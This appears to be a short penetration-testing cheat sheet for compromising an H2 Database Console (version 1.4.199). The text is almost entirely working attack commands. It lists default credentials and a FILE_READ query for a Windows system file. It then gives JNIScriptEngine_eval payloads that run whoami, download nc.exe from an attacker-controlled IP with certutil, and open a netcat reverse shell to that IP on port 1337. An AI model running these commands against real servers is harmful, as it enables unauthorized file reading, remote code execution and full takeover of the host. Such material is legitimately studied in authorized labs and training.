H2 Database Console

Default creds :

sa \ 

SELECT FILE_READ(‘C:\Windows\System32\drivers\etc\hosts’, NULL);

H2 Database Console version 1.4.199

CALL JNIScriptEngine_eval(‘new java.util.Scanner(java.lang.Runtime.getRuntime().exec(“whoami”).getInputStream()).useDelimiter(“\\Z”).next()’);

CALL JNIScriptEngine_eval(‘new java.util.Scanner(java.lang.Runtime.getRuntime().exec(“certutil -urlcache -f http://192.168.45.239/nc.exe C:\\Users\\tony\\Downloads\\nc.exe”).getInputStream()).useDelimiter(“\\Z”).next()’);

CALL JNIScriptEngine_eval(‘new java.util.Scanner(java.lang.Runtime.getRuntime().exec(“C:\\Users\\tony\\Downloads\\nc.exe -e cmd 192.168.45.239 1337”).getInputStream()).useDelimiter(“\\Z”).next()’);